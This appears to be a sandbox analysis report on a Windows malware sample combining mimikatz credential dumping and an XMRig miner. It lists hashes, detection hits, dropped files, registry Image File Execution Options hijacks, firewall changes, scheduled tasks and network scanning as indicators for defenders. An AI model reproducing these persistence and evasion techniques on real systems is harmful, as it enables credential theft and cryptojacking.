mimikatz | 1adbb08e3a24bc1451b7cc527ddbe65ca08cd45941e65d090f028dc8193e51b9

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240419-en
resource tags

arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
submitted
01/05/2024, 01:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-05-01_b1d2ac4dc1a18578d360188b94eccea8_hacktools_icedid_mimikatz.exe
Size

7.4MB
MD5

b1d2ac4dc1a18578d360188b94eccea8
SHA1

05ee61b2e20bb3c6a64b30438b9cdc116c2648ef
SHA256

1adbb08e3a24bc1451b7cc527ddbe65ca08cd45941e65d090f028dc8193e51b9
SHA512

6ede18abcc216f8943b704b6956cb3aa0e53f7d2882ec5fcf0b27cd93174a9414bb99eda82208ffd3d3bcc6a0f1b8916b0bce9bb3c351bbdb5c86c8b0ac4c907
SSDEEP

196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Score

10^/10

mimikatz xmrig discovery evasion miner persistence upx

Malware Config

Signatures

Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3068 created 2136	3068	lbskpuk.exe	39

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (44417) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs

resource	yara_rule
behavioral2/memory/1992-138-0x00007FF7664E0000-0x00007FF7665CE000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore

UPX dump on OEP (original entry point) 39 IoCs

resource	yara_rule
behavioral2/memory/3124-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
behavioral2/memory/3124-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
behavioral2/files/0x000d000000023b9d-6.dat	UPX
behavioral2/memory/1676-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
behavioral2/files/0x0008000000023c91-135.dat	UPX
behavioral2/memory/1992-136-0x00007FF7664E0000-0x00007FF7665CE000-memory.dmp	UPX
behavioral2/memory/1992-138-0x00007FF7664E0000-0x00007FF7665CE000-memory.dmp	UPX
behavioral2/files/0x0007000000023ca4-141.dat	UPX
behavioral2/memory/2468-142-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	UPX
behavioral2/memory/2468-160-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	UPX
behavioral2/files/0x0008000000023c99-164.dat	UPX
behavioral2/memory/4332-165-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	UPX
behavioral2/memory/3556-171-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	UPX
behavioral2/memory/628-175-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	UPX
behavioral2/memory/792-187-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	UPX
behavioral2/memory/4332-189-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	UPX
behavioral2/memory/5232-192-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	UPX
behavioral2/memory/4332-195-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	UPX
behavioral2/memory/5460-197-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	UPX
behavioral2/memory/3488-201-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	UPX
behavioral2/memory/5812-205-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	UPX
behavioral2/memory/4332-208-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	UPX
behavioral2/memory/5756-210-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	UPX
behavioral2/memory/6056-218-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	UPX
behavioral2/memory/4332-222-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	UPX
behavioral2/memory/1960-223-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	UPX
behavioral2/memory/4364-227-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	UPX
behavioral2/memory/3780-230-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	UPX
behavioral2/memory/4332-231-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	UPX
behavioral2/memory/5848-233-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	UPX
behavioral2/memory/380-235-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	UPX
behavioral2/memory/940-237-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	UPX
behavioral2/memory/4332-238-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	UPX
behavioral2/memory/5160-240-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	UPX
behavioral2/memory/900-242-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	UPX
behavioral2/memory/4332-243-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	UPX
behavioral2/memory/4332-244-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	UPX
behavioral2/memory/4332-245-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	UPX
behavioral2/memory/4332-247-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	UPX

XMRig Miner payload 10 IoCs

miner

resource	yara_rule
behavioral2/memory/4332-189-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	xmrig
behavioral2/memory/4332-195-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	xmrig
behavioral2/memory/4332-208-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	xmrig
behavioral2/memory/4332-222-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	xmrig
behavioral2/memory/4332-231-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	xmrig
behavioral2/memory/4332-238-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	xmrig
behavioral2/memory/4332-243-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	xmrig
behavioral2/memory/4332-244-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	xmrig
behavioral2/memory/4332-245-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	xmrig
behavioral2/memory/4332-247-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 5 IoCs

resource	yara_rule
behavioral2/memory/3124-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/3124-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/files/0x000d000000023b9d-6.dat	mimikatz
behavioral2/memory/1676-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/1992-138-0x00007FF7664E0000-0x00007FF7665CE000-memory.dmp	mimikatz

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	lbskpuk.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	lbskpuk.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3604	netsh.exe
3620	netsh.exe

Sets file execution options in registry 2 TTPs 40 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	lbskpuk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	lbskpuk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	lbskpuk.exe

Executes dropped EXE 29 IoCs

pid	Process
1676	lbskpuk.exe
3068	lbskpuk.exe
1556	wpcap.exe
4880	gcmiezrkb.exe
1992	vfshost.exe
2468	phqiqqbrk.exe
2184	xohudmc.exe
532	zebhau.exe
4332	kgtuib.exe
3556	phqiqqbrk.exe
628	phqiqqbrk.exe
228	kybllnpce.exe
792	phqiqqbrk.exe
5232	phqiqqbrk.exe
5460	phqiqqbrk.exe
3488	phqiqqbrk.exe
5812	phqiqqbrk.exe
5756	phqiqqbrk.exe
5460	lbskpuk.exe
6056	phqiqqbrk.exe
1960	phqiqqbrk.exe
4364	phqiqqbrk.exe
3780	phqiqqbrk.exe
5848	phqiqqbrk.exe
380	phqiqqbrk.exe
940	phqiqqbrk.exe
5160	phqiqqbrk.exe
900	phqiqqbrk.exe
3476	lbskpuk.exe

Loads dropped DLL 12 IoCs

pid	Process
1556	wpcap.exe
1556	wpcap.exe
1556	wpcap.exe
1556	wpcap.exe
1556	wpcap.exe
1556	wpcap.exe
1556	wpcap.exe
1556	wpcap.exe
1556	wpcap.exe
4880	gcmiezrkb.exe
4880	gcmiezrkb.exe
4880	gcmiezrkb.exe

UPX packed file 35 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0008000000023c91-135.dat	upx
behavioral2/memory/1992-136-0x00007FF7664E0000-0x00007FF7665CE000-memory.dmp	upx
behavioral2/memory/1992-138-0x00007FF7664E0000-0x00007FF7665CE000-memory.dmp	upx
behavioral2/files/0x0007000000023ca4-141.dat	upx
behavioral2/memory/2468-142-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	upx
behavioral2/memory/2468-160-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	upx
behavioral2/files/0x0008000000023c99-164.dat	upx
behavioral2/memory/4332-165-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	upx
behavioral2/memory/3556-171-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	upx
behavioral2/memory/628-175-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	upx
behavioral2/memory/792-187-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	upx
behavioral2/memory/4332-189-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	upx
behavioral2/memory/5232-192-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	upx
behavioral2/memory/4332-195-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	upx
behavioral2/memory/5460-197-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	upx
behavioral2/memory/3488-201-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	upx
behavioral2/memory/5812-205-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	upx
behavioral2/memory/4332-208-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	upx
behavioral2/memory/5756-210-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	upx
behavioral2/memory/6056-218-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	upx
behavioral2/memory/4332-222-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	upx
behavioral2/memory/1960-223-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	upx
behavioral2/memory/4364-227-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	upx
behavioral2/memory/3780-230-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	upx
behavioral2/memory/4332-231-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	upx
behavioral2/memory/5848-233-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	upx
behavioral2/memory/380-235-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	upx
behavioral2/memory/940-237-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	upx
behavioral2/memory/4332-238-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	upx
behavioral2/memory/5160-240-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	upx
behavioral2/memory/900-242-0x00007FF79B5A0000-0x00007FF79B5FB000-memory.dmp	upx
behavioral2/memory/4332-243-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	upx
behavioral2/memory/4332-244-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	upx
behavioral2/memory/4332-245-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	upx
behavioral2/memory/4332-247-0x00007FF7F8A20000-0x00007FF7F8B40000-memory.dmp	upx

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	ifconfig.me

Creates a Windows Service
persistence

Drops file in System32 directory 10 IoCs

description	ioc	Process
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File created	C:\Windows\SysWOW64\zebhau.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\zebhau.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	lbskpuk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	lbskpuk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	lbskpuk.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe

Drops file in Windows directory 59 IoCs

description	ioc	Process
File created	C:\Windows\uctlcnkl\lbskpuk.exe	2024-05-01_b1d2ac4dc1a18578d360188b94eccea8_hacktools_icedid_mimikatz.exe
File created	C:\Windows\zlitictgt\thiyltjuy\wpcap.exe	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\exma-1.dll	lbskpuk.exe
File opened for modification	C:\Windows\uctlcnkl\spoolsrv.xml	lbskpuk.exe
File created	C:\Windows\zlitictgt\Corporate\mimilib.dll	lbskpuk.exe
File created	C:\Windows\ime\lbskpuk.exe	lbskpuk.exe
File created	C:\Windows\zlitictgt\thiyltjuy\gcmiezrkb.exe	lbskpuk.exe
File created	C:\Windows\zlitictgt\thiyltjuy\Packet.dll	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\libeay32.dll	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\tucl-1.dll	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\vimpcsvc.exe	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\schoedcl.xml	lbskpuk.exe
File created	C:\Windows\uctlcnkl\spoolsrv.xml	lbskpuk.exe
File created	C:\Windows\zlitictgt\thiyltjuy\wpcap.dll	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\trch-1.dll	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\ucl.dll	lbskpuk.exe
File created	C:\Windows\uctlcnkl\vimpcsvc.xml	lbskpuk.exe
File created	C:\Windows\zlitictgt\thiyltjuy\kybllnpce.exe	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\vimpcsvc.xml	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\svschost.xml	lbskpuk.exe
File created	C:\Windows\zlitictgt\Corporate\vfshost.exe	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\coli-0.dll	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\posh-0.dll	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\schoedcl.xml	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\Shellcode.ini	lbskpuk.exe
File opened for modification	C:\Windows\zlitictgt\thiyltjuy\Packet.dll	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\docmicfg.exe	lbskpuk.exe
File created	C:\Windows\uctlcnkl\svschost.xml	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\AppCapture64.dll	lbskpuk.exe
File created	C:\Windows\zlitictgt\thiyltjuy\scan.bat	lbskpuk.exe
File opened for modification	C:\Windows\uctlcnkl\lbskpuk.exe	2024-05-01_b1d2ac4dc1a18578d360188b94eccea8_hacktools_icedid_mimikatz.exe
File created	C:\Windows\zlitictgt\UnattendGC\spoolsrv.xml	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\svschost.xml	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\docmicfg.xml	lbskpuk.exe
File opened for modification	C:\Windows\uctlcnkl\docmicfg.xml	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\cnli-1.dll	lbskpuk.exe
File created	C:\Windows\uctlcnkl\docmicfg.xml	lbskpuk.exe
File created	C:\Windows\zlitictgt\upbdrjv\swrpwe.exe	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\xdvl-0.dll	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\schoedcl.exe	lbskpuk.exe
File opened for modification	C:\Windows\uctlcnkl\svschost.xml	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\zlib1.dll	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\spoolsrv.xml	lbskpuk.exe
File opened for modification	C:\Windows\uctlcnkl\vimpcsvc.xml	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\svschost.exe	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\docmicfg.xml	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\AppCapture32.dll	lbskpuk.exe
File opened for modification	C:\Windows\zlitictgt\Corporate\log.txt	cmd.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\crli-0.dll	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\ssleay32.dll	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\tibe-2.dll	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\spoolsrv.exe	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\vimpcsvc.xml	lbskpuk.exe
File created	C:\Windows\zlitictgt\Corporate\mimidrv.sys	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\libxml2.dll	lbskpuk.exe
File created	C:\Windows\zlitictgt\UnattendGC\specials\trfo-2.dll	lbskpuk.exe
File created	C:\Windows\uctlcnkl\schoedcl.xml	lbskpuk.exe
File opened for modification	C:\Windows\uctlcnkl\schoedcl.xml	lbskpuk.exe
File created	C:\Windows\zlitictgt\thiyltjuy\ip.txt	lbskpuk.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2752	sc.exe
1356	sc.exe
2088	sc.exe
4796	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral2/files/0x000d000000023b9d-6.dat	nsis_installer_2
behavioral2/files/0x000a000000023bbc-14.dat	nsis_installer_1
behavioral2/files/0x000a000000023bbc-14.dat	nsis_installer_2

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1052	schtasks.exe
3608	schtasks.exe
4936	schtasks.exe

Modifies data under HKEY_USERS 44 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	phqiqqbrk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	phqiqqbrk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	phqiqqbrk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	phqiqqbrk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	phqiqqbrk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	phqiqqbrk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	phqiqqbrk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	phqiqqbrk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	phqiqqbrk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	phqiqqbrk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	phqiqqbrk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	phqiqqbrk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	phqiqqbrk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	phqiqqbrk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	phqiqqbrk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	phqiqqbrk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	phqiqqbrk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	lbskpuk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	lbskpuk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	phqiqqbrk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	phqiqqbrk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	phqiqqbrk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	phqiqqbrk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	phqiqqbrk.exe
